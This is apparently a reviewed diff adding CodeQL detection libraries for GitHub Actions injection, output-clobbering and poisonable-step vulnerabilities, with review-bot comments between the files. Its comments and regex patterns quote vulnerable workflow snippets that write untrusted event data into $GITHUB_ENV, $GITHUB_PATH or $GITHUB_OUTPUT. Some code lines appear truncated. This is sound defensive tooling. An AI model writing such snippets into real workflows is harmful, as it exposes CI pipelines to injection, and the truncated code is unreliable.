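Review bot: `CodeInjectionSink` is public but has no QLDoc; suggest `/** A script expression of a `Run` step, or a models-as-data "code-injection" sink. */` above the class. The second disjunct of `isAdditionalFlowStep` taints the script of every later `Run` step that contains some file-read command, regardless of which file is read or whether it came from the `FileSource` step, so a `cat README.md` after an untrusted checkout is treated as fully tainted. If that over-approximation is deliberate it deserves a comment at that disjunct, e.g. `// Conservative: any file read after an untrusted checkout/download may return attacker-controlled content.`; otherwise tie the read to the path produced by the source step.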
diff --git a/actions/ql/lib/codeql/actions/security/CommandInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/CommandInjectionQuery.qll
new file mode 100644
index 000000000000..59d523cd5827
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/security/CommandInjectionQuery.qll
@@ -0,0 +1,22 @@
+private import actions
+private import codeql.actions.TaintTracking
+private import codeql.actions.dataflow.ExternalFlow
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.DataFlow
+
+private class CommandInjectionSink extends DataFlow::Node {
+ CommandInjectionSink() { madSink(this, "command-injection") }
+}
+
+/**
+ * A taint-tracking configuration for unsafe user input
+ * that is used to construct and evaluate a system command.
+ */
+private module CommandInjectionConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink }
+}
+
+/** Tracks flow of unsafe user input that is used to construct and evaluate a system command. */
+module CommandInjectionFlow = TaintTracking::Global;
diff --git a/actions/ql/lib/codeql/actions/security/ControlChecks.qll b/actions/ql/lib/codeql/actions/security/ControlChecks.qll
new file mode 100644
index 000000000000..244c04310d6d
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/security/ControlChecks.qll
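Review bot: `CommandInjectionSink` has no QLDoc and, unlike `ArgumentInjectionSink` and `CodeInjectionSink` in the sibling query files, is declared `private`, so queries cannot add their own sinks by extending it. If keeping it private is deliberate, a comment still belongs above it, e.g. `/** A models-as-data "command-injection" sink; extend the MaD rows rather than this class. */`; otherwise drop `private` for consistency with the other sink classes.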
@@ -0,0 +1,312 @@
+import actions
+
+string any_category() {
+ result =
+ [
+ "untrusted-checkout", "output-clobbering", "envpath-injection", "envvar-injection",
+ "command-injection", "argument-injection", "code-injection", "cache-poisoning",
+ "untrusted-checkout-toctou", "artifact-poisoning", "artifact-poisoning-toctou"
+ ]
+}
+
+string non_toctou_category() {
+ result = any_category() and not result = "untrusted-checkout-toctou"
+}
+
+string toctou_category() { result = ["untrusted-checkout-toctou", "artifact-poisoning-toctou"] }
+
+string any_event() { result = actor_not_attacker_event() or result = actor_is_attacker_event() }
+
+string actor_is_attacker_event() {
+ result =
+ [
+ // actor and attacker have to be the same
+ "pull_request_target",
+ "workflow_run",
+ "discussion_comment",
+ "discussion",
+ "issues",
+ "fork",
+ "watch"
+ ]
+}
+
+string actor_not_attacker_event() {
+ result =
+ [
+ // actor and attacker can be different
+ // actor may be a collaborator, but the attacker is may be the author of the PR that gets commented
+ // therefore it may be vulnerable to TOCTOU races where the actor reviews one thing and the attacker changes it
+ "issue_comment",
+ "pull_request_comment",
+ ]
+}
+
+/** An If node that contains an actor, user or label check */
+abstract class ControlCheck extends AstNode {
+ ControlCheck() {
+ this instanceof If or
+ this instanceof Environment or
+ this instanceof UsesStep or
+ this instanceof Run
+ }
+
+ predicate protects(AstNode node, Event event, string category) {
+ // The check dominates the step it should protect
+ this.dominates(node) and
+ // The check is effective against the event and category
+ this.protectsCategoryAndEvent(category, event.getName()) and
+ // The check can be triggered by the event
+ this.getATriggerEvent() = event
+ }
+
+ predicate dominates(AstNode node) {
+ this instanceof If and
+ (
+ node.getEnclosingStep().getIf() = this or
+ node.getEnclosingJob().getIf() = this or
+ node.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or
+ node.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this
+ )
+ or
+ this instanceof Environment and
+ (
+ node.getEnclosingJob().getEnvironment() = this
+ or
+ node.getEnclosingJob().getANeededJob().getEnvironment() = this
+ )
+ or
+ (
+ this instanceof Run or
+ this instanceof UsesStep
+ ) and
+ (
+ this.(Step).getAFollowingStep() = node.getEnclosingStep()
+ or
+ node.getEnclosingJob().getANeededJob().(LocalJob).getAStep() = this.(Step)
+ )
+ }
+
+ abstract predicate protectsCategoryAndEvent(string category, string event);
+}
+
+abstract class AssociationCheck extends ControlCheck {
+ // Checks if the actor is a MEMBER/OWNER the repo
+ // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR
+ // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR
+ override predicate protectsCategoryAndEvent(string category, string event) {
+ event = actor_is_attacker_event() and category = any_category()
+ or
+ event = actor_not_attacker_event() and category = non_toctou_category()
+ }
+}
+
+abstract class ActorCheck extends ControlCheck {
+ // checks for a specific actor
+ // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR
+ // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR
+ override predicate protectsCategoryAndEvent(string category, string event) {
+ event = actor_is_attacker_event() and category = any_category()
+ or
+ event = actor_not_attacker_event() and category = non_toctou_category()
+ }
+}
+
+abstract class RepositoryCheck extends ControlCheck {
+ // checks that the origin of the code is the same as the repository.
+ // for pull_requests, that means that it triggers only on local branches or repos from the same org
+ // - they are effective against pull requests/workflow_run since they can control where the code is coming from
+ // - they are not effective against issue_comment since the repository will always be the same
+}
+
+abstract class PermissionCheck extends ControlCheck {
+ // checks that the actor has a specific permission level
+ // - they are effective against pull requests/workflow_run since they can control who can make changes
+ // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR
+ override predicate protectsCategoryAndEvent(string category, string event) {
+ event = actor_is_attacker_event() and category = any_category()
+ or
+ event = actor_not_attacker_event() and category = non_toctou_category()
+ }
+}
+
+abstract class LabelCheck extends ControlCheck {
+ // checks if the issue/pull_request is labeled, which implies that it could have been approved
+ // - they dont protect against mutation attacks
+ override predicate protectsCategoryAndEvent(string category, string event) {
+ event = actor_is_attacker_event() and category = any_category()
+ or
+ event = actor_not_attacker_event() and category = non_toctou_category()
+ }
+}
+
+class EnvironmentCheck extends ControlCheck instanceof Environment {
+ // Environment checks are not effective against any mutable attacks
+ // they do actually protect against untrusted code execution (sha)
+ override predicate protectsCategoryAndEvent(string category, string event) {
+ event = actor_is_attacker_event() and category = any_category()
+ or
+ event = actor_not_attacker_event() and category = non_toctou_category()
+ }
+}
+
+abstract class CommentVsHeadDateCheck extends ControlCheck {
+ override predicate protectsCategoryAndEvent(string category, string event) {
+ // by itself, this check is not effective against any attacks
+ event = actor_not_attacker_event() and category = toctou_category()
+ }
+}
+
+/* Specific implementations of control checks */
+class LabelIfCheck extends LabelCheck instanceof If {
+ string condition;
+
+ LabelIfCheck() {
+ condition = normalizeExpr(this.getCondition()) and
+ (
+ // eg: contains(github.event.pull_request.labels.*.name, 'safe to test')
+ condition.regexpMatch(".*(^|[^!])contains\\(\\s*github\\.event\\.pull_request\\.labels\\b.*")
+ or
+ // eg: github.event.label.name == 'safe to test'
+ condition.regexpMatch(".*\\bgithub\\.event\\.label\\.name\\s*==.*")
+ )
+ }
+}
+
+class ActorIfCheck extends ActorCheck instanceof If {
+ ActorIfCheck() {
+ // eg: github.event.pull_request.user.login == 'admin'
+ exists(
+ normalizeExpr(this.getCondition())
+ .regexpFind([
+ "\\bgithub\\.event\\.pull_request\\.user\\.login\\b",
+ "\\bgithub\\.event\\.head_commit\\.author\\.name\\b",
+ "\\bgithub\\.event\\.commits.*\\.author\\.name\\b",
+ "\\bgithub\\.event\\.sender\\.login\\b"
+ ], _, _)
+ )
+ or
+ // eg: github.actor == 'admin'
+ // eg: github.triggering_actor == 'admin'
+ exists(
+ normalizeExpr(this.getCondition())
+ .regexpFind(["\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b",], _, _)
+ ) and
+ not normalizeExpr(this.getCondition()).matches("%[bot]%")
+ }
+}
+
+class PullRequestTargetRepositoryIfCheck extends RepositoryCheck instanceof If {
+ PullRequestTargetRepositoryIfCheck() {
+ // eg: github.event.pull_request.head.repo.full_name == github.repository
+ exists(
+ normalizeExpr(this.getCondition())
+ // github.repository in a workflow_run event triggered by a pull request is the base repository
+ .regexpFind([
+ "\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b",
+ "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.full_name\\b",
+ "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.owner\\.name\\b",
+ "\\bgithub\\.event\\.workflow_run\\.head_repository\\.full_name\\b",
+ "\\bgithub\\.event\\.workflow_run\\.head_repository\\.owner\\.name\\b"
+ ], _, _)
+ )
+ }
+
+ override predicate protectsCategoryAndEvent(string category, string event) {
+ event = "pull_request_target" and category = any_category()
+ }
+}
+
+class WorkflowRunRepositoryIfCheck extends RepositoryCheck instanceof If {
+ WorkflowRunRepositoryIfCheck() {
+ // eg: github.event.workflow_run.head_repository.full_name == github.repository
+ exists(
+ normalizeExpr(this.getCondition())
+ // github.repository in a workflow_run event triggered by a pull request is the base repository
+ .regexpFind([
+ "\\bgithub\\.event\\.workflow_run\\.head_repository\\.full_name\\b",
+ "\\bgithub\\.event\\.workflow_run\\.head_repository\\.owner\\.name\\b"
+ ], _, _)
+ )
+ }
+
+ override predicate protectsCategoryAndEvent(string category, string event) {
+ event = "workflow_run" and category = any_category()
+ }
+}
+
+class AssociationIfCheck extends AssociationCheck instanceof If {
+ AssociationIfCheck() {
+ // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association)
+ normalizeExpr(this.getCondition())
+ .splitAt("\n")
+ .regexpMatch([
+ ".*\\bgithub\\.event\\.comment\\.author_association\\b.*",
+ ".*\\bgithub\\.event\\.issue\\.author_association\\b.*",
+ ".*\\bgithub\\.event\\.pull_request\\.author_association\\b.*",
+ ])
+ }
+}
+
+class AssociationActionCheck extends AssociationCheck instanceof UsesStep {
+ AssociationActionCheck() {
+ this.getCallee() = "TheModdingInquisition/actions-team-membership" and
+ (
+ not exists(this.getArgument("exit"))
+ or
+ this.getArgument("exit") = "true"
+ )
+ or
+ this.getCallee() = "actions/github-script" and
+ this.getArgument("script").splitAt("\n").matches("%getMembershipForUserInOrg%")
+ or
+ this.getCallee() = "octokit/request-action" and
+ this.getArgument("route").regexpMatch("GET.*(memberships).*")
+ }
+}
+
+class PermissionActionCheck extends PermissionCheck instanceof UsesStep {
+ PermissionActionCheck() {
+ this.getCallee() = "actions-cool/check-user-permission" and
+ (
+ // default permission level is write
+ not exists(this.getArgument("permission-level")) or
+ this.getArgument("require") = ["write", "admin"]
+ )
+ or
+ this.getCallee() = "sushichop/action-repository-permission" and
+ this.getArgument("required-permission") = ["write", "admin"]
+ or
+ this.getCallee() = "prince-chrismc/check-actor-permissions-action" and
+ this.getArgument("permission") = ["write", "admin"]
+ or
+ this.getCallee() = "lannonbr/repo-permission-check-action" and
+ this.getArgument("permission") = ["write", "admin"]
+ or
+ this.getCallee() = "xt0rted/slash-command-action" and
+ (
+ // default permission level is write
+ not exists(this.getArgument("permission-level")) or
+ this.getArgument("permission-level") = ["write", "admin"]
+ )
+ or
+ this.getCallee() = "actions/github-script" and
+ this.getArgument("script").splitAt("\n").matches("%getCollaboratorPermissionLevel%")
+ or
+ this.getCallee() = "octokit/request-action" and
+ this.getArgument("route").regexpMatch("GET.*(collaborators|permission).*")
+ }
+}
+
+class BashCommentVsHeadDateCheck extends CommentVsHeadDateCheck, Run {
+ BashCommentVsHeadDateCheck() {
+ // eg: if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then
+ exists(string cmd1, string cmd2 |
+ cmd1 = this.getScript().getACommand() and
+ cmd2 = this.getScript().getACommand() and
+ not cmd1 = cmd2 and
+ cmd1.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") and
+ cmd2.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*")
+ )
+ }
+}
diff --git a/actions/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll
new file mode 100644
index 000000000000..33efc9b1bc8f
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll
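Review bot: `non_toctou_category()` removes only `untrusted-checkout-toctou` from `any_category()`, while `toctou_category()` declared right below it also contains `artifact-poisoning-toctou`; as written, every association, actor, permission, label and environment check on an `issue_comment`/`pull_request_comment` event is treated as protecting against artifact-poisoning TOCTOU, which is precisely the race the comments in `actor_not_attacker_event()` say such checks cannot prevent. Define it against the other helper so the two cannot drift: `string non_toctou_category() { result = any_category() and not result = toctou_category() }`. In `PermissionActionCheck`, the `actions-cool/check-user-permission` branch tests `not exists(this.getArgument("permission-level"))` but reads `this.getArgument("require")`; the existence check looks copied from the `xt0rted/slash-command-action` branch and should be `not exists(this.getArgument("require"))`, otherwise a step configured with `require: read` is still accepted as a write-level gate. The QLDoc on `ControlCheck` (`An If node that contains an actor, user or label check`) is also narrower than the characteristic predicate, which admits `Environment`, `UsesStep` and `Run` nodes too.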
@@ -0,0 +1,114 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery + +abstract class EnvPathInjectionSink extends DataFlow::Node { } + +/** + * Holds if a Run step declares a PATH environment variable with contents from a local file. + */ +class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { + EnvPathInjectionFromFileReadSink() { + exists(Run run, Step step | + ( + step instanceof UntrustedArtifactDownloadStep or + step instanceof PRHeadCheckoutStep + ) and + this.asExpr() = run.getScript() and + step.getAFollowingStep() = run and + ( + // echo "$(cat foo.txt)" >> $GITHUB_PATH + // FOO=$(cat foo.txt) + // echo "$FOO" >> $GITHUB_PATH + exists(string cmd | + run.getScript().getAFileReadCommand() = cmd and + run.getScript().getACmdReachingGitHubPathWrite(cmd) + ) + or + // cat foo.txt >> $GITHUB_PATH + run.getScript().fileToGitHubPath(_) + ) + ) + } +} + +/** + * Holds if a Run step executes a command that returns untrusted data which flows to GITHUB_ENV + * e.g. + * run: | + * COMMIT_MESSAGE=$(git log --format=%s) + * echo "${COMMIT_MESSAGE}" >> $GITHUB_PATH + */ +class EnvPathInjectionFromCommandSink extends EnvPathInjectionSink { + EnvPathInjectionFromCommandSink() { + exists(CommandSource source | + this.asExpr() = source.getEnclosingRun().getScript() and + source.getEnclosingRun().getScript().getACmdReachingGitHubPathWrite(source.getCommand()) + ) + } +} + +/** + * Holds if a Run step declares an environment variable, uses it to declare a PATH env var. + * e.g. 
+ * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "$BODY" >> $GITHUB_PATH + */ +class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { + EnvPathInjectionFromEnvVarSink() { + exists(Run run, string var_name | + run.getScript().getAnEnvReachingGitHubPathWrite(var_name) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScript() = this.asExpr() + ) + } +} + +class EnvPathInjectionFromMaDSink extends EnvPathInjectionSink { + EnvPathInjectionFromMaDSink() { madSink(this, "envpath-injection") } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate an environment variable. + */ +private module EnvPathInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof EnvPathInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string var | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run.getScript() and + ( + run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) + or + run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) + or + run.getScript().getAnEnvReachingGitHubPathWrite(var) + ) + ) + or + exists(Uses step | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = step and + succ.asExpr() = step and + madSink(succ, "envpath-injection") + ) + or + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) + ) + } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate the PATH environment variable. */ +module EnvPathInjectionFlow = TaintTracking::Global; 
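Review bot: The QLDoc on `EnvPathInjectionFromCommandSink` and on `EnvPathInjectionConfig` still describes the env-var query it was copied from: the class comment says the data "flows to GITHUB_ENV" while its own example writes to `$GITHUB_PATH`, and the config comment says the input is "used to construct and evaluate an environment variable". Suggest `Holds if a Run step executes a command that returns untrusted data which flows to GITHUB_PATH` for the class and `A taint-tracking configuration for unsafe user input that is used to extend the PATH environment variable.` for the module. `EnvPathInjectionSink` and `EnvPathInjectionFromMaDSink` carry no QLDoc at all; a one-liner such as `/** A sink where untrusted data is appended to GITHUB_PATH. */` would make the public API self-describing.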
diff --git a/actions/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll new file mode 100644 index 000000000000..656ea1207b51 --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
@@ -0,0 +1,169 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery + +abstract class EnvVarInjectionSink extends DataFlow::Node { } + +string sanitizerCommand() { + result = + [ + "tr\\s+(-d\\s*)?('|\")?.n('|\")?", // tr -d '\n' ' ', tr '\n' ' ' + "tr\\s+-cd\\s+.*:al(pha|num):", // tr -cd '[:alpha:_]' + "(head|tail)\\s+-n\\s+1" // head -n 1, tail -n 1 + ] +} + +/** + * Holds if a Run step declares an environment variable with contents from a local file. + */ +class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { + EnvVarInjectionFromFileReadSink() { + exists(Run run, Step step | + ( + step instanceof UntrustedArtifactDownloadStep or + step instanceof PRHeadCheckoutStep + ) and + this.asExpr() = run.getScript() and + step.getAFollowingStep() = run and + ( + // eg: + // echo "SHA=$(cat test-results/sha-number)" >> $GITHUB_ENV + // echo "SHA=$(> $GITHUB_ENV + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string cmd, string var, string sanitizer | + run.getScript().getAFileReadCommand() = cmd and + run.getScript().getACmdReachingGitHubEnvWrite(cmd, var) and + run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and + not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) + ) + or + // eg: cat test-results/.env >> $GITHUB_ENV + run.getScript().fileToGitHubEnv(_) + ) + ) + } +} + +/** + * Holds if a Run step executes a command that returns untrusted data which flows to GITHUB_ENV + * e.g. 
+ * run: | + * COMMIT_MESSAGE=$(git log --format=%s) + * echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV + */ +class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { + CommandSource inCommand; + string injectedVar; + string command; + + EnvVarInjectionFromCommandSink() { + exists(Run run | + this.asExpr() = inCommand.getEnclosingRun().getScript() and + run = inCommand.getEnclosingRun() and + run.getScript().getACmdReachingGitHubEnvWrite(inCommand.getCommand(), injectedVar) and + ( + // the source flows to the injected variable without any command in between + not run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + command = "" + or + // the source flows to the injected variable with a command in between + run.getScript().getACmdReachingGitHubEnvWrite(command, injectedVar) and + not command.regexpMatch(".*" + sanitizerCommand() + ".*") + ) + ) + } +} + +/** + * Holds if a Run step declares an environment variable, uses it to declare env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "FOO=$BODY" >> $GITHUB_ENV + */ +class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { + string inVar; + string injectedVar; + string command; + + EnvVarInjectionFromEnvVarSink() { + exists(Run run | + run.getScript() = this.asExpr() and + exists(run.getInScopeEnvVarExpr(inVar)) and + run.getScript().getAnEnvReachingGitHubEnvWrite(inVar, injectedVar) and + ( + // the source flows to the injected variable without any command in between + not run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + command = "" + or + // the source flows to the injected variable with a command in between + run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + run.getScript().getACmdReachingGitHubEnvWrite(command, injectedVar) and + not command.regexpMatch(".*" + sanitizerCommand() + ".*") + ) + ) + } +} + +/** + * Holds if a 3rd party action declares an environment variable with contents from an 
untrusted file. + * e.g. + *- name: Load .env file + * uses: aarcangeli/load-dotenv@v1.0.0 + * with: + * path: 'backend/new' + * filenames: | + * .env + * .env.test + * quiet: false + * if-file-not-found: error + */ +class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { + EnvVarInjectionFromMaDSink() { madSink(this, "envvar-injection") } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate an environment variable. + */ +private module EnvVarInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source.(RemoteFlowSource).getSourceType() = ["branch", "username"] + } + + predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string var | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run.getScript() and + ( + run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) + or + run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) + ) + ) + or + exists(Uses step | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = step and + succ.asExpr() = step and + madSink(succ, "envvar-injection") + ) + or + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) + ) + } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate an environment variable. */ +module EnvVarInjectionFlow = TaintTracking::Global; diff --git a/actions/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/actions/ql/lib/codeql/actions/security/OutputClobberingQuery.qll new file mode 100644 index 000000000000..1d0de83afa34 --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/OutputClobberingQuery.qll 
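Review bot: In `EnvVarInjectionFromCommandSink` the "without any command in between" branch looks unreachable: the conjunct just above it already requires `run.getScript().getACmdReachingGitHubEnvWrite(inCommand.getCommand(), injectedVar)`, so `not run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar)` can never hold and `command` is never bound to `""`. The surviving branch holds as soon as any command reaching the write fails the sanitizer regex; if `getACmdReachingGitHubEnvWrite` yields each command of a pipeline separately (its definition is outside this hunk), the unsanitized source command itself satisfies `not command.regexpMatch(...)`, and an intermediate `tr -d '\n'` would not suppress the result. The same any-rather-than-all shape appears in `EnvVarInjectionFromFileReadSink` (variable `sanitizer`) and `EnvVarInjectionFromEnvVarSink`; if the intent is "no sanitizer on the path", the check reads `not exists(string c | run.getScript().getACmdReachingGitHubEnvWrite(c, injectedVar) and c.regexpMatch(".*" + sanitizerCommand() + ".*"))`. `sanitizerCommand()` also lacks QLDoc; a line stating that these patterns are treated as newline-stripping sanitizers for GITHUB_ENV writes would document the assumption.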
@@ -0,0 +1,220 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery + +abstract class OutputClobberingSink extends DataFlow::Node { } + +/** + * Holds if a Run step declares a step output variable with contents from a local file. + * e.g. + * run: | + * cat test-results/.vars >> $GITHUB_OUTPUT + * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT + * echo "sha=$(> $GITHUB_OUTPUT + */ +class OutputClobberingFromFileReadSink extends OutputClobberingSink { + OutputClobberingFromFileReadSink() { + exists(Run run, Step step, string field1, string field2 | + ( + step instanceof UntrustedArtifactDownloadStep + or + step instanceof SimplePRHeadCheckoutStep + ) and + step.getAFollowingStep() = run and + this.asExpr() = run.getScript() and + // A write to GITHUB_OUTPUT that is not attacker-controlled + exists(string str | + // The output of a command that is not a file read command + run.getScript().getACmdReachingGitHubOutputWrite(str, field1) and + not str = run.getScript().getAFileReadCommand() + or + // A hard-coded string + run.getScript().getAWriteToGitHubOutput(field1, str) and + str.regexpMatch("[\"'0-9a-zA-Z_\\-]+") + ) and + // A write to GITHUB_OUTPUT that is attacker-controlled + ( + // echo "sha=$(> $GITHUB_OUTPUT + exists(string cmd | + run.getScript().getACmdReachingGitHubOutputWrite(cmd, field2) and + run.getScript().getAFileReadCommand() = cmd + ) + or + // cat test-results/.vars >> $GITHUB_OUTPUT + run.getScript().fileToGitHubOutput(_) and + field2 = "UNKNOWN" + ) + ) + } +} + +/** + * Holds if a Run step declares an environment variable, uses it in a step variable output. + * e.g. 
+ * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "FOO=$BODY" >> $GITHUB_OUTPUT + */ +class OutputClobberingFromEnvVarSink extends OutputClobberingSink { + OutputClobberingFromEnvVarSink() { + exists(Run run, string field1, string field2 | + // A write to GITHUB_OUTPUT that is attacker-controlled + exists(string var | + run.getScript().getAnEnvReachingGitHubOutputWrite(var, field1) and + exists(run.getInScopeEnvVarExpr(var)) and + run.getScript() = this.asExpr() + ) and + // A write to GITHUB_OUTPUT that is not attacker-controlled + exists(string str | + // The output of a command that is not a file read command + run.getScript().getACmdReachingGitHubOutputWrite(str, field2) and + not str = run.getScript().getAFileReadCommand() + or + // A hard-coded string + run.getScript().getAWriteToGitHubOutput(field2, str) and + str.regexpMatch("[\"'0-9a-zA-Z_\\-]+") + ) and + not field2 = field1 + ) + } +} + +/** + * - id: clob1 + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * # VULNERABLE + * echo $BODY + * echo "::set-output name=OUTPUT::SAFE" + * - id: clob2 + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * # VULNERABLE + * echo "::set-output name=OUTPUT::SAFE" + * echo $BODY + */ +class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { + string clobbering_var; + string clobbered_value; + + WorkflowCommandClobberingFromEnvVarSink() { + exists(Run run, string workflow_cmd_stmt, string clobbering_stmt | + run.getScript() = this.asExpr() and + run.getScript().getAStmt() = clobbering_stmt and + clobbering_stmt.regexpMatch("echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + clobbering_var + ".*") and + exists(run.getInScopeEnvVarExpr(clobbering_var)) and + run.getScript().getAStmt() = workflow_cmd_stmt and + clobbered_value = + trimQuotes(workflow_cmd_stmt.regexpCapture(".*::set-output\\s+name=.*::(.*)", 1)) + ) + } +} + +/** + * - id: clob1 + * run: | + * # VULNERABLE + * PR="$(; 
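Review bot: The QLDoc of `WorkflowCommandClobberingFromEnvVarSink` is only a YAML example with no sentence stating what the class represents; open it with `Holds if a Run step echoes an environment variable and also emits a ::set-output workflow command, so the variable's content can clobber that output.`. The pattern `"echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + clobbering_var + ".*"` has no boundary after the variable name, so a variable `BODY` also matches `echo $BODY_SAFE`; appending `\\b` after `clobbering_var` would tighten it. The remainder of this file after the `PR="$(` example is not legible in this rendering and was not reviewed.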
diff --git a/actions/ql/lib/codeql/actions/security/PoisonableSteps.qll b/actions/ql/lib/codeql/actions/security/PoisonableSteps.qll new file mode 100644 index 000000000000..1f3bc66bd776 --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/PoisonableSteps.qll 
@@ -0,0 +1,56 @@
+import actions
+
+abstract class PoisonableStep extends Step { }
+
+class DangerousActionUsesStep extends PoisonableStep, UsesStep {
+ DangerousActionUsesStep() { poisonableActionsDataModel(this.getCallee()) }
+}
+
+class PoisonableCommandStep extends PoisonableStep, Run {
+ PoisonableCommandStep() {
+ exists(string regexp |
+ poisonableCommandsDataModel(regexp) and
+ this.getScript().getACommand().regexpMatch(regexp)
+ )
+ }
+}
+
+class JavascriptImportUsesStep extends PoisonableStep, UsesStep {
+ JavascriptImportUsesStep() {
+ exists(string script, string line |
+ this.getCallee() = "actions/github-script" and
+ script = this.getArgument("script") and
+ line = script.splitAt("\n").trim() and
+ // const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')
+ // const script = require('${{ github.workspace }}/scripts/test.js');
+ // const script = require('./scripts');
+ line.regexpMatch(".*(import|require)\\(('|\")(\\./|.*github.workspace).*")
+ )
+ }
+}
+
+class SetupNodeUsesStep extends PoisonableStep, UsesStep {
+ SetupNodeUsesStep() {
+ this.getCallee() = "actions/setup-node" and
+ this.getArgument("cache") = "yarn"
+ }
+}
+
+class LocalScriptExecutionRunStep extends PoisonableStep, Run {
+ string path;
+
+ LocalScriptExecutionRunStep() {
+ exists(string cmd, string regexp, int path_group | cmd = this.getScript().getACommand() |
+ poisonableLocalScriptsDataModel(regexp, path_group) and
+ path = cmd.regexpCapture(regexp, path_group)
+ )
+ }
+
+ string getPath() { result = normalizePath(path.splitAt(" ")) }
+}
+
+class LocalActionUsesStep extends PoisonableStep, UsesStep {
+ LocalActionUsesStep() { this.getCallee().matches("./%") }
+
+ string getPath() { result = normalizePath(this.getCallee()) }
+}
diff --git a/actions/ql/lib/codeql/actions/security/RequestForgeryQuery.qll b/actions/ql/lib/codeql/actions/security/RequestForgeryQuery.qll
new file mode 100644
index 000000000000..ca0ac267131f
--- /dev/null
